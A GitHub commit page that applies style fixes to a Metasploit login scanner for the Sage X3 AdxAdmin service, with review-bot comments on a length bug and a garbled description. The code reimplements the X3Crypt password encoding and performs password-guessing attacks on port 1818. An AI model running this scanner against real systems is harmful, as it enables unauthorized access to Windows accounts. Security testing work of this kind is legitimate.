Fix a bunch of things
Mostly RuboCop.
wvu committed Jul 20, 2021
1 parent 8b50713 commit aefdb8d
Showing 3 changed files with 100 additions and 116 deletions.
42 changes: 17 additions & 25 deletions lib/metasploit/framework/login_scanner/x3.rb
@@ -1,7 +1,5 @@
# -*- coding: binary -*-

# require 'msf/core'
# require 'msf/core/exploit/tcp'
require 'metasploit/framework/login_scanner/base'
require 'metasploit/framework/login_scanner/rex_socket'
require 'metasploit/framework/tcp/client'
Expand All @@ -10,44 +8,38 @@ module Metasploit
module Framework
module LoginScanner
class X3

include Metasploit::Framework::LoginScanner::Base
include Metasploit::Framework::LoginScanner::RexSocket
include Metasploit::Framework::Tcp::Client

DEFAULT_PORT = 1818
REALM_KEY = nil

def encrypt_pass(inp)
# check if it's already encrypted
if inp.include?('CRYPT:')
return inp
end
return inp if inp.include?('CRYPT:')

num2 = inp.length
num = 17
ret = ''
charset_0 = 'cromanwqxfzpgedkvstjhyilu'.chars
charset0 = 'cromanwqxfzpgedkvstjhyilu'.chars
xyz = 'zxWyZxzvwYzxZXxxZWWyWxYXz'.chars
charset_1 = 'cf2tln3yuVkDr7oPaQ8bsSd4x'.chars
charset1 = 'cf2tln3yuVkDr7oPaQ8bsSd4x'.chars

(0..num2 - 1).each do |i|
num5 = inp[i].ord
num7 = num5.to_f / num.to_f
num7 = num5.to_f / num
num10 = (num5 % num)
num11 = xyz[i].ord
num12 = num11 - num7
if num12.to_i != num12
num12 += 1
end
num12 += 1 if num12.to_i != num12
ret << num12.to_i.chr
ret << charset_0[num10].ord.chr
off = charset_0.find_index(ret.split('').to_a[-1])
if off & 1 == 0
ret << charset_1[off].ord.chr
end
ret << charset0[num10].ord.chr
off = charset0.find_index(ret.split('').to_a[-1])
ret << charset1[off].ord.chr if (off & 1).zero?
end
ret = 'CRYPT:' + ret
return ret

"CRYPT:#{ret}"
end

def attempt_login(credential)
Expand Down Expand Up @@ -77,19 +69,18 @@ def attempt_login(credential)
auth_buffer << t_auth_buffer.length
auth_buffer << t_auth_buffer

# add the password

begin
connect
select([sock], nil, nil, 0.4)

if enc_pass
sock.put(auth_buffer)
result_options[:proof] = sock.get_once(1024, 2)
if result_options[:proof] && result_options[:proof].length == 4
if result_options[:proof].chars != ["\xFF","\xFF","\xFF","\xFF"]
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
end

if result_options[:proof] && result_options[:proof].length == 4 && (result_options[:proof].chars != [
"\xFF", "\xFF", "\xFF", "\xFF"
])
result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
end
end
rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
Expand All @@ -111,6 +102,7 @@ def set_sane_defaults
self.connection_timeout ||= 5
self.port ||= DEFAULT_PORT
end

end
end
end
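Review bot: In `encrypt_pass`, `xyz[i].ord` raises NoMethodError once `inp` is longer than the 25-character `xyz` table, because `xyz[i]` is nil from index 25 on; the cleanup leaves that path unchanged. A guard placed right after `xyz` is assigned would make the limit explicit, e.g. `raise ArgumentError, 'input longer than key table' if inp.length > xyz.length`, or the caller could skip such credentials instead. The call to `encrypt_pass` sits in the collapsed part of `attempt_login`, so whether it runs inside the `begin` block cannot be confirmed from this page; the visible `rescue` list (`Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE`) would not catch either error. As a smaller style point in the same loop, `ret.split('').to_a[-1]` is equivalent to `ret[-1]`.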
@@ -1,5 +1,11 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/x3'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary

include Msf::Auxiliary::Scanner
Expand All @@ -11,18 +17,18 @@ def initialize(_info = {})
super(
'Name' => 'Sage X3 AdxAdmin Login Scanner',
'Description' => %q{
This module allows an attacker to perform a password guessing attack against
the Sage X3 AdxAdmin service which in turn can be used to authenticate against
as a local windows account.
This module allows an attacker to perform a password guessing attack against
the Sage X3 AdxAdmin service, which in turn can be used to authenticate against
as a local Windows account.
This module implements the X3Crypt function to 'encrypt' any passwords to
be used during the authentication process, provided a plaintext password.
This module implements the X3Crypt function to 'encrypt' any passwords to
be used during the authentication process, given a plaintext password.
},
'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/'],
['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
]
)

Expand All @@ -34,12 +40,7 @@ def initialize(_info = {})
]
)

deregister_options('PASSWORD_SPRAY')
deregister_options('BLANK_PASSWORDS')
end

def target
"#{rhost}:#{rport}"
deregister_options('PASSWORD_SPRAY', 'BLANK_PASSWORDS')
end

def run_host(ip)
Expand Down Expand Up @@ -73,24 +74,22 @@ def run_host(ip)
module_fullname: fullname,
workspace_id: myworkspace_id
)

case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}'"
print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
next
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore['VERBOSE']
print_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
end
vprint_brute(level: :verror, ip: ip, msg: "Could not connect: #{result.proof}")
when Metasploit::Model::Login::Status::INCORRECT
if datastore['VERBOSE']
print_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'"
end
vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
end

invalidate_login(credential_data)
end
end

end
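Review bot: The `'Description'` text in `initialize` still reads "can be used to authenticate against as a local Windows account", which does not parse even though this commit rewrote that sentence. Dropping the stray word fixes it: `the Sage X3 AdxAdmin service, which in turn can be used to authenticate as a local Windows account.` The body of `initialize` is split across several hunks with collapsed lines between them, so only the visible part of the description was checked.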